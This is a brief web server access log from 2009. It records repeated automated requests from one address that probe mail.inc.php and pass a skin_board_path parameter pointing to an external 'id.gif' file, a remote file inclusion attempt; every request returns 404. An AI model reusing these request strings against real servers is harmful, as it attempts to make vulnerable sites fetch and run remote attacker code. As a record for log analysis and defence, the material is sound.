61.8.0.47 - - [26/Jul/2009:07:27:43 -0400] "GET /logs/access_log.Q109052800/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:27:47 -0400] "GET /mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:27:47 -0400] "GET /logs/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:27:47 -0400] "GET /logs/access_log.Q109052800/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:27:50 -0400] "GET /mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:27:51 -0400] "GET /logs/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.8.0.47 - - [26/Jul/2009:07:27:51 -0400] "GET /logs/access_log.Q109052800/mail.inc.php?skin_board_path=http://www.homesteadnazarene.org/id.gif? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
